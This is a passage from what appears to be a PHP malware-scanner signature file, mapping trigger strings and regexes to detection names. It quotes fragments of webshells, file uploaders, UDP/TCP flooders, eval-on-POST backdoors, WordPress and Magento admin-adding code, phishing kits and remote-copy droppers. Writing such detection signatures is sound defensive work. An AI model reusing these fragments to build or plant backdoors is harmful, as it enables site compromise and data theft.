		'$smtp_errors = "421,422,431,432,' => array(STR_CLEARFILE, 'php.hacktool.mailer.022', NULL),
	),

	'$newpass = file_get_contents' => array(STR_TRIGGER,
		'class Whm{' => array(STR_CLEARFILE, 'php.hacktool.whm-hack.001', NULL),
	),

	'if (substr(trim($res), 0, 3) != "+OK") {' => array(STR_TRIGGER,
		'return "cracked";' => array(STR_CLEARFILE, 'php.hacktool.bruteforce.003', NULL),
	),

	'$this->SendMSG("Transfer type: ".($this->_type==FTP_BINARY' => array(STR_CLEARFILE, 'php.hacktoot.ftp_client.001', NULL),
	'<b>UDP Flood' => array(STR_CLEARFILE, 'php.hacktool.UDPflood.001', NULL),
	'$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);'=> array(STR_CLEARFILE, 'php.hacktool.UDPflood.002',NULL),
	'echo \'Phate\\\'s UDP Flooder V\' . $version' =>  array(STR_CLEARFILE, 'php.hacktool.UDPflood.003', NULL),
	'elseif($_GET[\'method\'] == "slowloris")' => array(STR_CLEARFILE, 'php.hacktool.slowloris.001', NULL),
	'$sock = @fsockopen("udp://{$_GET[\'ip\']}"' => array(STR_CLEARFILE, 'php.hacktool.ddos.005', NULL),
	'$sock = @fsockopen("tcp://{$_GET[\'ip\']}"' => array(STR_CLEARFILE, 'php.hacktool.ddos.006', NULL),
	'if($fp = @fsockopen($ip, $port, $errno, $errstr, 20))' =>  array(STR_CLEARFILE, 'php.hacktool.php_proxy.003', NULL),
	'fwrite($f,get_download($_GET[' =>  array(STR_CLEARFILE, 'php.hacktool.downloader.001', NULL),
	'$data = get_download($update_url.\'?id=1&bad&host=\'' =>  array(STR_CLEARFILE, 'php.hacktool.downloader.002', NULL),
	'.die //kill the bot' => array(STR_CLEARFILE, 'php.hacktool.ircbot.002', NULL),
	'eeLCoMz AI PHPBot' => array(STR_CLEARFILE, 'php.hacktool.ircbot.003', NULL),
	'class pBot' => array(STR_CLEARFILE, 'php.hacktool.ircbot.005', NULL),
	',".raw <cmd> [raw IRC command]");' => array(STR_CLEARFILE, 'php.hacktool.ircbot.006', NULL,1),
	'REMOTE_ADDR|HTTP_REFERER|HTTP_USER_AGENT|\\' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.010', NULL,1),
	'get_remote_file("\x68\x74\x74\x70\x3a\x2f\x2f\x61\x70\x69\x2e\x73\x65\x6f\x2d\x6d\x6f\x7a\x2e' => array(STR_CLEARFILE, 'php.malware.fake-seo-moz.002', NULL,1),
	'$out.= "XXDD0S".$dosstr' => array(STR_CLEARFILE, 'php.hacktool.ddos.004', NULL),
	'$hasil = googling($q,$m);' => array(STR_CLEARFILE, 'php.hacktool.googler.001', NULL),
	'\'msg\' => \'Theres no writable dir for MX chache. This will decrease' => array(STR_CLEARFILE, 'php.mailer.FCrDNS.001', NULL), // http://en.wikipedia.org/wiki/Forward-confirmed_reverse_DNS
	'if (strlen($res) > 0) { echo \'drtty\'; } else { echo \'**Nope**\';}' => array(STR_CLEARFILE, 'php.mailer.POST.013.02', NULL),
	'if(isset($_POST[id]) && isset($_POST[ipAddr]) && isset($_POST[serv_name]) && isset($_POST[body]))' => array(STR_CLEARFILE, 'php.mailer.POST.021', NULL),
	'"POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form' => array(STR_CLEARFILE, 'php.hacktool.jce_exploit.001', NULL),
	'PHP DDoS Bot' => array(STR_CLEARFILE, 'php.hacktool.ddos.009', NULL),
	'TCP Flood</b><br>Completed' => array(STR_CLEARFILE, 'php.hacktool.ddos.010', NULL),
	'$file->SaveToBin("wp-admin.zip");' => array(STR_CLEARFILE, 'php.malware.hobodun.001', NULL),
	'== $hashcode &&' => array(STR_CLEARFILE, 'php.backdoor.uploader.050.01', NULL),
	'echo ":::NICE:::{$links[$i2][\'login\']};{$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.055', '\/\/\w+\s*if\s*?\(\s*?isset\s*?\(\s*?\$_[^@]+?@fsockopen(?:[^:]+?:){4,6}?:*?BAD:::(?:[^;]+?;){2,5}\s*?echo ":::NICE:::\{\$links\[\$i2\]\[\'login\'\]\};\{\$[^\-]+?\-[^\/]+?\/\/\w+'),
	'str_replace($url,$_SERVER[\'HTTP_HOST\'].$path_to_dor,$html);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.029', NULL),
	'/handlers/spiderhandler.php?checkdomain&time=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway_downloader.023', 'if\s*\(!?@?\$incode[^&]+?&type=fopen[^}]+?\}[^\/]+?\/handlers\/spiderhandler\.php\?checkdomain&time=[^}]+?\}'),
	'MB) packets averaging ". round($packets/$exec_time' => array(STR_CLEARFILE, 'php.hacktool.UDPflood.005', NULL),
	'round($packets/$exec_time,' => array(STR_CLEARFILE, 'php.hacktool.ddos.013', NULL),
	'$fp = @fsockopen($site, $passwordxx);' => array(STR_CLEARFILE, 'php.malware.redirect.019', NULL),
	'$fp = fsockopen(\'udp://\'.$dest, $port, $errno, $errstr, 5);'=> array(STR_CLEARFILE, 'php.hacktool.UDPflood.007',NULL),
),

'exit' => array(STR_TRIGGER,

	'eval(stripslashes($_POST[' => array(STR_TRIGGER,

		'if(isset($_POST[' => array(STR_TRIGGER,
			'$backdoor_c=' => array(STR_CLEARFILE,'php.backdoor.webshell.102', NULL),
			']))' => array(STR_CLEAR_LINEMATCH,'php.backdoor.eval_POST.019', '<\?php[\s]*if[\s]*\(isset.._POST\[.[\w]+.\]\)\)[\s]*\{[\s]*@?eval\(stripslashes\(\$_POST\[.[\w]+.\]\)\);[\s]*exit\(?\)?;[\s]*\};?[\s]*\?>'),
		),

		'GIF89' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.005', NULL),
		'MulCiShell' => array(STR_CLEARFILE, 'php.backdoor.MulCiShell.001', NULL),
		'echo eval(stripslashes($_POST[\'phpcode\']));' => array(STR_CLEARFILE, 'php.backdoor.MulCiShell.001.02', NULL),
	),

	'header(\'Location:' => array(STR_TRIGGER,

		'$spiders = array(' => array(STR_TRIGGER,

			'stripos($_SERVER[\'HTTP_USER_AGENT' => array(STR_TRIGGER,
				'is_bot()' => array(STR_CLEARFILE, 'php.redirect.header_location.034', NULL),
			),

			'(!is_bot())' => array(STR_CLEARFILE, 'php.redirect.header_location.031', NULL),
		),

		'header(\'Location: index.php\');' => array(STR_TRIGGER,
			'<meta http-equiv="refresh" content="1;URL=http' => array(STR_TRIGGER,
				'stripos($_SERVER[\'HTTP_ACCEPT_LANGUAGE\'],' => array(STR_CLEARFILE, 'php.spam-seo.redirect.110', NULL),
			),
		),

		'$_SERVER[\'REQUEST_URI\'];' => array(STR_TRIGGER,
			']->Title?></title>' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.239', '(\$\w+)\s*=\s*\$_SERVER\[.REQUEST_URI.\];\s*(\$\w+)\s=\s*[\'macy\.]{4,};\s*(\$\w+)\s*=\s*[^;]+;\s*\$\w+\s*=\s*[^\.]+\.\3\.\2;[^\{]+\{\s*if\(substr\(\1,[^\{]+\{\s*header\(.HTTP[^;]+;\s*header\(.Location[^\(]+\(\1,[^;]+;\s*exit\(\);\s*\}[^>]+>Urls;[^<]+<title><\?php[^\']+\'<a\s*href=[^<]+>Name\.[^\|]+\|[^\(]+\(\);\s*\}\s*}\s*}'),
		),
	),

	'<?php $' => array(STR_TRIGGER,

		'\x7a\151";exit;' => array(STR_TRIGGER,
			'8WIasekXis7kuVk=";$' => array(STR_CLEARFILE, 'php.backdoor.filesman.054', NULL),
		),

		'"\x3b");exit;' => array(STR_TRIGGER,
			'eNpNnFev\'  . \'69x6Xu/9' => array(STR_CLEARFILE, 'php.backdoor.filesman.022', NULL),
		),
	),

	'$ruser=$_POST[\'ruser\'];' => array(STR_TRIGGER,
		'$rusers=explode(",",$ruser);' => array(STR_TRIGGER,
			'echo(\'[ok]comment_id=\'.$comment_id);}' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.003', NULL),
		),
	),

	'${"_REQ' => array(STR_TRIGGER,
		'\'//e\'' => array(STR_TRIGGER,
			'*/if/*' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.028', NULL),
		),
	),

	')));");' => array(STR_TRIGGER,
		'(isset ($_GET[\'check\']))' => array(STR_TRIGGER,
			'echo "checked";' => array(STR_CLEARFILE, 'php.backdoor.filesman.139', NULL),
		),
	),

	');exit;' => array(STR_TRIGGER,
		'PD9waHA' => array(STR_TRIGGER,
			'\$[\w]+=((.[\w]+.)\.?)+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\([^;]+;.\);[\s]*\$[\w]+\(.[^)]+.\);exit;' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.generic.095', '(@[\w]+\(.*?\);[\s]*)*\$[\w]+=((.[\w]+.)\.?)+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\([^;]+;.\);[\s]*\$[\w]+\(.[^)]+.\);exit;'),
		),
	),

	'require(' => array(STR_TRIGGER,
		'Google\')!==false){$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.073', 'define\(.WP_USE_THEMES.,\s*true\);\s*\$(\w+)=false;\s*\$(\w+)=\$_SERVER\[.HTTP_USER_AGENT.\];\s*if\(stripos\(\$\2,.Google.\)\!==false\)\{\$\1=true;\}[^\.]+.\W\w+\W\w+\.\w+.\);\s*exit\(\);\s*\}'),
	),

	'echo $file;' => array(STR_TRIGGER,
		'if(isset($_GET["lian"]))' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.036', 'if\\(is_array\\(\\$_GET\\)&&count\\(\\$_GET\\)>0\\)[\\s]*\\{[\\s]*if.isset.._GET..lian[^>]+echo \\$file;[\\s]*exit;[\\s]*}[\\s]*}'),
	),

	'@arsort($alphabet);' => array(STR_TRIGGER,
		'@$value($array_name($_REQUEST["array"]));' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.021', 'if\(isset\(\$_REQUEST\[.array.\]\)\)\{[^}]+@arsort\(\$alphabet\);[\s]*@\$value.\$array_name\(\$_REQUEST\[[^}]+exit\(\);[\s]*}'),
	),

	'@ini_set(' => array(STR_TRIGGER,
		'@session_name(\'zPayPal_' => array(STR_CLEARFILE, 'php.phishing.paypal.025', NULL),
	),

	'<?php /*' => array(STR_TRIGGER,
		'if ($_SERVER["QUERY_STRING"]) { exit($_SERVER["QUERY_STRING"]); }' => array(STR_CLEARFILE, 'php.malware.component.020', NULL),
	),

	'PD9waHAgJHsi' => array(STR_CHAIN_TRIGGER,
		'\$[\w]+[\s]*=[\s]*\$[\w]+\((".*?"(,|\.)?)+\);[\s]*\$[\w]+\(' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_gen.025', '\$[\w]+[\s]*=[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\((".*?"(,|\.)?)+\);[\s]*\$[\w]+\(.PD9w[^)]+\);exit;'),
	),

	'copy(\'http://tinyurl' => array(STR_CLEAR_LINEMATCH, 'php.malware.copy.001.02', 'copy\(.http:..tinyurl\.com.\w+.\,.\w+\.[php|js|phtml|html|py|pl]+.\);exit;'),
	'print \'Domain changed!\';}else{print \'Key Error!\';}exit(0);} ?>' => array(STR_CLEARFILE, 'php.spam-seo.injector.110.02', NULL),
	' $e = \'.php\'; $q = ""; $test = \'suka-test\'; if' => array(STR_CLEARFILE, 'php.redirect.header_location.015', NULL),
	'$url_parse = explode($article_url_parse, $_SERVER[ \'REQUEST_URI\' ]);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.037', NULL),
	'else if ($isJa && !$isoldpage){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.038', '\\$isBot=isGoogleBot..;[\\s]*\\$isoldpage=isoldpage..;[^>]+>document.location[^>]+script>[^>]+function isoldpage...[\\s]*if.strpos.._SERVER..REQUEST_UR[^;]+;[\\s]*else return true;[\\s]*}'),
	'$url=\'https://www.sfr.fr/cas/login\';' => array(STR_CLEARFILE, 'php.phishing.sfr.003', NULL),
	'$url="https://retail.santander.co.uk/EBAN_Accounts_ENS/BtoChannelDriver.ssobto?dse_operationName' => array(STR_CLEARFILE, 'php.phishing.santander.001', NULL),
	'$_REQUEST["wp_super_hash_nonce"]=datetime)) {  echo "<all_ok_doit' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.030', 'if .isset.._REQUEST."wp_super_hash_nonce".. && .._REQUEST."wp_super_hash_nonce".=datetime.. .  echo "<all_ok_doit[^?]+echo "<status_error>";. exit;.'),
	'case "20": echo "Error 403";exit;break;}}' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.005','<.php if.isset.._REQUEST."[\\w]+".... switch .._REQUEST."[\\w]+"...case "[\\w]+": echo "Error 403";exit;break;.. .>'),
	'isset($_POST[\'ok\']) && isset($_FILES[\'joomLa' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.joomla_gen.003', 'if.isset.\$_REQUEST[^\{]+\{\s*if .isset.._POST..ok... && isset.._FILES..joomLa..+?\}\s*exit;\s*\}\s*if ..empty.._GET[^s]+system.._GET[^\}]+\}'),
	'{echo \'<textarea id=areatext>\';eval(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.025', 'if\s*..empty.\$_COOKIE[^>]+if\s*..empty.\$_POST[^;]+echo\s*.<textarea[^>]+>.;eval.\$[^>]+textarea>[^\}]+\}\}\s*exit;'),
	'($u($_REQUEST[$i]));exit();}' => array(STR_CLEARFILE, 'php.backdoor.generic.032', NULL),
	'ZWNobyAnJzs=' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.018', 'if..isset.\$_POST.[^;]+exit;[^;]+\$c=isset.\$_POST[^>]+def=.strlen.\$c[^;]+ZWNobyAnJzs=.;[^;]+eval.\$def.;'),
	'if [ -f \'./libworker.so\' ];then killall -9 host;export AU=' => array(STR_CLEARFILE, 'sh.backdoor.linux-rootkit.001', NULL),
	'$contents = curlget($url1."/url.php?list=".$uu);' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.injector.140', 'set_time_limit.0.;[\s]*.fin = \$_GET..fin..;[\s]*function curlget[^\?]+\?list=[^}]+}\s*if[^\[]+\[.id[^\}]+\}(\s*exit;\s*\})?([^\]]+\];[^\{]+\{\s*\$\w+\s*=\s*file_get_contents[^\{]+\{\s*echo[^\{]+\{\s*echo\s*curlget[^\}]+\}\s*\}\s*exit;\s*\})?'), 
	'"   .  "\x3b");exit;' => array(STR_CLEARFILE,'php.backdoor.filesman.020', NULL),
	'404 Not Found\'); exit(); }else{ $s="p"."r"."e"."g' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.040', 'if\\(!\\$_POST\\[[\'"][\\w]+[\'"]\\]\\)\\{header..HTTP.1.1 404 Not Found..; exit..;..else[^=]+="p"."r"."e"."g[^}]+Access..; }'),
),

'copy' => array(STR_TRIGGER,

	'copy($_FILES' => array(STR_TRIGGER,

		'method="post" enctype="multipart/form-data" name="u' => array(STR_TRIGGER,

			'reporting(0);chmod(basename($_SERVER["PHP_SELF' => array(STR_TRIGGER,
				'error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.249.02', 'error_reporting\(0\);chmod\(basename\(\$_SERVER\[.PHP_SELF.\]\), 0444\);'),
			),

			'mail(' => array(STR_TRIGGER,
				'$body=("Shell: http:' => array(STR_CLEARFILE, 'php.backdoor.uploader.249.03', NULL),
			),

			'if($_SESSION[' => array(STR_TRIGGER,
				'md5(sha1($' => array(STR_CLEARFILE, 'php.backdoor.uploader.343', NULL),
			),

			'function printLogin()' => array(STR_CLEARFILE, 'php.backdoor.uploader.001.07', NULL),
			'echo \'<' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.001.03', '(if[\s]*\([\s]*isset[\s]*\([\s]*\$_GET[^\{]+\{\s*|if\s*\(\s*@?\$_\w+\[.\w+.\]\s*===?\s*.upl[^\}]+?\}[^\{]+?\{\s*)?echo \'<[^@]+@(?:\$[^@]+?@)?copy\(\$_FILES\[.file.\]\[.tmp_name.\][^}]+\}([\s]*else[^}]+[\s\}]*)?'),
			'error_reporting\(0\);(?:\s*echo\([\'"]\S+[\'"]\)\s*;)?[\s]*if\(isset\(\$_(REQUEST|POST|GET)\[[^]]+\]\)\)[\s]*\{[\s]*echo[\s]*.<form[^}]+copy\(\$_FILES..file.\]\[.tmp_name' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.uploader.244', 'error_reporting\(0\);(?:\s*echo\([\'"]\S+[\'"]\)\s*;)?[\s]*if\(isset\(\$_(REQUEST|POST|GET)\[[^]]+\]\)\)[\s]*\{[\s]*echo[\s]*.<form[^}]+copy\(\$_FILES..file.\]\[.tmp_name[^}]+\}[\s]*else[\s]*\{[\s]*echo[^}]+\}[\s};]+'),
			'){if(@copy($_FILES[\'file\'][\'tmp_name\'],$_FILES[\'file\'][\'name\'])){echo' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.249', 'echo\([^)]+\)\s*;\s*if\(isset\(\$_GET\[[\'"]\w+[\'"]\s*\]\s*\)\s*\)\s*{\s*echo\s*[\'"]\s*<\s*form[^>]+method\=.[PpOoSsTt]{4}[\'"]\s*enctype\s*=\s*.multipart\/form-data[^>]+>\s*.\s*;\s*echo\s*[\'"]\s*<input\s*type[^{]+{\s*if\s*\(\s*\@\s*copy\(\$_FILES\[.\w+.\]\s*\[[^{]+{\s*echo\s*[^}]+}\s*else\s*{\s*echo[^}]+}\s*}\s*;\s*}\s*;'),
		),

		'copy($_FILES["file"]["tmp_name"]' => array(STR_TRIGGER,

			'){if(@copy($_FILES[' => array(STR_TRIGGER,
				'if($_GET["login"]==' => array(STR_CLEARFILE, 'php.backdoor.uploader.348', NULL),
			),

			' = <<<' => array(STR_CLEARFILE, 'php.spam-seo.dropper.001', NULL),
			'eval(getBot(' => array(STR_CLEARFILE, 'php.backdoor.uploader.137', NULL),
			'($file != "." && $file != ".."&& $file != ".htaccess"&&!strpos($file,".")&&!strpos($file,"log"' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.015', NULL),
			'>"; } echo "Uploader By' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.252', 'if\(\$_GET\[.login.\]=+[\'"]\w+[\'"]\s*\)\s*{\s*if\(\@copy\(\$_FILES\[.file.\]\s*\[.tmp_name.\],\s*\$_FILES\[.file.\]\s*\[.name.\]\s*\)\s*\)\s*{\s*echo\s*[\'"]\s*<b>\s*[Uu]pload[^<]+<\s*\/b>[^}]+}\s*echo\s*[\'"][Uu]ploader\s*[Bb]y[^}]+}\s*(?:\?>\s*)?(?:<\!--\s*)?<form\s*action=[^>]+>\s*<input\s*type=.file[^>]+>\s*<input\s*type[^>]+>\s*<\/form>(?:-->)?'),
		),

		'$_POST[$key] = stripslashes($value);' => array(STR_TRIGGER,
			'} elseif (($perms & 0x8000) == 0x8000) {' => array(STR_CLEARFILE, 'php.backdoor.xhell.001.01', NULL),
			'Upload Gagal' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.008', NULL),
		),

		'ini_set(\'upload_max_filesize' => array(STR_TRIGGER,
			'echo $status;' => array(STR_TRIGGER,
				'$status = "Archivo subido: ".$archivo."";' => array(STR_CLEARFILE, 'php.backdoor.uploader.248', NULL),
			),
		),

		'if(isset($_POST["submit"])) { if (@copy($_FILES["filetoupload"]["tmp_name"], $_FILES["filetoupload"]["name"]))' => array(STR_TRIGGER,
			') { echo "<title>' => array(STR_CLEARFILE, 'php.backdoor.uploader.001.09', NULL),
		),

		'if($_POST[\'upload\'])' => array(STR_TRIGGER,
			'.php_uname().' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.029', NULL),
		),

		'@ini_get("disable_functions")' => array(STR_TRIGGER,
			'Gagal' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.053', NULL),
		),

		'@copy($_FILES[' => array(STR_TRIGGER,
			'<\?php[\s]*@copy\(\$_FILES\[[^\]]+\]\[[^\]]+\],[\s]*\$_POST\[[^\]]+\]\);' => array(REX_CLEARFILE, 'php.backdoor.uploader.395', NULL),
			'echo "gagal' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.018', NULL),
		),

		'<title>404 Not Found</title>' => array(STR_CLEARFILE, 'php.backdoor.uploader.001.05', NULL),
		'// Silence is golden.' => array(STR_CLEARFILE, 'php.backdoor.uploader.001.06', NULL),
		'if($_POST[\'_upl\']==\'up\')' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.001.08', 'if\(isset\(\$_GET\[.[\w]+.\]\)\)[\s]*\{[\s]*echo .<form action=[^;]+form>.;[\s]*if\(\$_POST\[._upl[^{]+\{[\s]*if\(@copy[^}]+;[\s]*}[\s]*}[\s]*(exit;[\s]*)?\}'),
		'>Hacked By' => array(STR_CLEARFILE, 'php.backdoor.uploader.134', NULL),
		'<\?php[\s]*if[\s]*\([\s]*copy[\s]*\([\s]*\$_FILES[^;]+\$_POST' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.uploader_POST.011', 'if[\s]*\([\s]*copy[\s]*\([\s]*\$_FILES\[.[\w]+.\]\[.[\w]+.\][\s]*,[\s]*\$_POST[^;]+;'),
		'GIF89a' => array(STR_CLEARFILE, 'php.backdoor.uploader_fakegif.001', NULL),
		'echo [\'"](sukses|SUKSES|gagal|GAGAL)[^;]+;[\s\}]+\?>[\s]*\Z' => array(REX_CLEARFILE, 'php.backdoor.uploader_gen.016', NULL),
	),

	'") && @file_exists("' => array(STR_TRIGGER,
		'") && @md5_file("' => array(STR_TRIGGER,
			'") || @md5_file("' => array(STR_TRIGGER,
				'"){@chmod("' => array(STR_TRIGGER,
					'", 0444);}' => array(STR_TRIGGER,
						'", 0755);@copy(' => array(STR_CLEAR_LINEMATCH, 'php.malware.copy.003', 'if\(\(\!@file_exists\("[^"]+"\)[\s]*\|\| @md5_file[^\{]+\{@chmod[^\}]+0444\);\}'),
					),
				),
			),
		),
	),

	'* @subpackage  Template.system' => array(STR_TRIGGER,
		'$p = getcwd();' => array(STR_CLEARFILE, 'php.exploit.sysinfo.006', NULL),
	),

	'isset($_SERVER[\'HTTPS\']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"' => array(STR_TRIGGER,
		'fopen($file,"w") or die("Unable to open file!");' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.019', NULL),
	),

	'if ( @copy(\'https://paste' => array(STR_TRIGGER,
		'echo "Copy success!";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.094', 'if \( @copy\(\'https:\/\/paste[^\)]+?\)\s*?\)\s*?\{\s*?echo\s*?"Copy success!";\s*?\}\s*?else\s*?\{\s*?echo\s*?"Copy failed\.";\s*?\}'),
	),

	'@copy($formfile,$tofile);chmod($tofile,' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.213', 'error_reporting[^@]+?@copy\(\$formfile,\$tofile\);chmod\(\$tofile[^;]+?;\s*\}[^@]+?@copy[^}]+\}[\s]*if[\s]*\([\s]*hash[^\?]+while\(true\);'),
	'if[\s]*\([\s]*\(!@file_exists\(.[^\)]+\)[\s]*\|\|[\s]*@md5_file\([^@]+[\s]*&&[\s]*@file_exists\([^@]+&&[\s]*@md5_file\([^@]+\)[\s]*\{[\s]*@chmod\([^@]+[\d]+\);[\s]*@copy\([^@]+\);[\s]*@chmod\([^\}]+[\d]+\)[\s]*;[\s]*\}' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.injector.133', 'if[\s]*\([\s]*\(!@file_exists\(.[^\)]+\)[\s]*\|\|[\s]*@md5_file\([^@]+[\s]*&&[\s]*@file_exists\([^@]+&&[\s]*@md5_file\([^@]+\)[\s]*\{[\s]*@chmod\([^@]+[\d]+\);[\s]*@copy\([^@]+\);[\s]*@chmod\([^\}]+[\d]+\)[\s]*;[\s]*\}'),
	'@copy\((?:@)?\$_FILES\[.\w+.\]\s*\[[(?:\'")]?tmp_name[(?:\'")]?\]\s*,\s*(?:@)?\$_FILES\[.\w+.\]\s*\[[(?:\'")]?\w+[(?:\'")]?\]\s*\)\s*;\s*(?:exit;)?' => array(REX_CLEARFILE, 'php.backdoor.uploader_gen.011', NULL), 
	'if(sha1_file($formfile)!=sha1_file($tofile)){@unlink($tofile);@copy($formfile,$tofile);}' => array(STR_CLEARFILE, 'php.malware.copy.002', NULL),
),

'equire' => array(STR_TRIGGER,

	'equire_on' => array(STR_TRIGGER,

		'require_once' => array(STR_TRIGGER,

			'global $wpdb' => array(STR_TRIGGER,
		
				'$wpincludesdir = \'wp-includes/\';' => array(STR_TRIGGER,
					'if (is_dir($file)) recursiveRemove($file);' => array(STR_TRIGGER,
						'$wpdb->query("DROP TABLE IF EXISTS admin");' => array(STR_CLEARFILE, 'php.hacktool.wp_attacker.004', NULL),
					),
				),

				'$wpdb->query( "INSERT INTO `" . $db_prefix . "users` (`ID`, `user_login`, `user_pass`' => array(STR_TRIGGER,
					'capabilities\', \'a:1:{s:13:\"administrator\";s:1:\"1\";' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.007', NULL),
				),
			),

			'j..q..e..u..r..y...o..r..g' => array(STR_TRIGGER,
	
				'if \(!function_exists\(.[\w]+.\)\)[\s]*\{[\s]*function glues_it' => array(REX_TRIGGER,
					'u..p..d..a..t..e' => array(STR_CLEAR_MULTIMATCH, 'php.malware.fake_jquery.001', 'if[\s]*\(!function_exists\(.[\w]+.\)\)[\s]*\{[\s]*function glues_it\(\$string\)[\s]*\{[\s]*\$glue_pre[\s]*=[\s]*sanitize_key\([^;]+;[\s]*\$glueit_po[\s]*=[\s]*call_user_func_array\(\$glue_pre[^<]+\$snigulp_evitca,[\s]*\$sisnoitpo\)\);[\s]*\}[\s]*\}'),
				),

				'h..t..t..p..:../../..j..q..e..u..r..y...o..r..g..' => array(STR_CLEAR_MULTIMATCH, 'php.malware.fake_jquery.001.02', 'function glues_it\(\$string\)[\s]*\{[\s]*\$glue_pre[\s]*=[\s]*sanitize_key\([^;]+;[\s]*\$glueit_po[\s]*=[\s]*call_user_func_array\(\$glue_pre[^<]+\$snigulp_evitca,[\s]*\$sisnoitpo\)\);[\s]*\}[\s]*\}'),
			),

			'/joomla/base/adapterobserver.php\');' => array(STR_TRIGGER,
				'\n@require_once(JPATH_ADAPTERSERVER);",' => array(STR_CLEARFILE, 'php.spam-seo.injector.192.02', NULL), //order matters with following sig!
				'@require_once(JPATH_ADAPTERSERVER);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.192', 'define\(.JPATH_ADAPTERSERVER.,\s*dirname\(__FILE__\)\...joomla.base.adapterobserver\.php.\);\s*if\(file_exists\(JPATH_ADAPTERSERVER\)\)\s*@require_once\(JPATH_ADAPTERSERVER\);'),
			),

			'wp_set_auth_cookie($' => array(STR_TRIGGER,
				'wp_redirect(user_admin_url())' => array(STR_TRIGGER,
					'= get_user_by(\'id\',1);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.wp_admin_cookie.002', '(?:(\$\w+)\s*=\s*\$_SERVER\[.DOCUMENT_ROOT.\]\s*;\s*|ini_set\(.display_errors.,\s*\d+\);\s*ini_set\(.display_startup_errors.,\s*\d+\);\s*error_reporting\(\w+\)\s*;\s*if\(isset\(\$_GET\[.\w+.\]\)\)\s*{\s*}\s*if\(isset\(\$_GET\[.\w+.\]\)\)\s*{\s*)?require_once\([\'"\/\w\$\.]+wp-config\.php[\'"]\)\s*;\s*require_once\([\'"\/\w\$\.]+wp-includes\/pluggable\.php[\'"]\)\s*;\s*(\$\w+)\s*=\s*get_user_by\(.id.\s*,1\)\s*;\s*wp_set_auth_cookie\(\2->ID,1,1\)\s*;\s*wp_redirect\(user_admin_url\(\)\)\s*;(?:\s*}\s*if\(isset\(\$_GET\[.\w+.\]\)\)\s*{\s*echo\s*\d+\s*;\s*})?'),
					'usermeta where meta_key = \'wp_capabilities\' and meta_value like \'%administrator%\' limit 1)' => array(STR_CLEARFILE, 'php.malware.wp_admin_cookie.003', NULL),
				),
			),

			'= Mage::getModel(\'admin/user\')' => array(STR_TRIGGER,
				'$user->setRoleIds(array(1)' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.magento-login.005', 'try[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*Mage::getModel\(.admin\/user.\)[\s]*->setData\(array\([\s]*.username.[\s]*=>[\s]*.[\w]+.,[^\}]+\}[\s]*catch[\s]*\(Exception[\s]*\$[\w]+\)[\s]*\{[^\{]+try[\s]*\{[\s]*\$[\w]+[\s]*->[\s]*setRoleIds\(array\(1\)\)[^\{]+\{[\s]*echo[\s]*\$[\w]+->getMessage\(\);[\s]*exit;[\s]*\}'),
			),

			'$JsHttpRequest = new Subsys_JsHttpRequest_Php' => array(STR_TRIGGER,
				'$out_data = fread($fid_pe,' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.098', NULL),
			),

			'$optimizer=\'/' => array(STR_TRIGGER,
				'is_file($optimizer) ? require_once($optimizer) : null;' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.028', '\$optimizer=[^;]+;[\s]*is_file\(\$optimizer\) \? require_once\(\$optimizer\) : null;'),
			),

			'print "<user><login>' => array(STR_TRIGGER,
				'Super Administrator' => array(STR_CLEARFILE, 'php.backdoor.joomla_adminadd.001', NULL),
			),

			'gd-lib.php' => array(STR_CLEAR_MULTIMATCH, 'php.malware.gd-lib.001', 'require_once\([^;]+gd-lib.php.\);'),
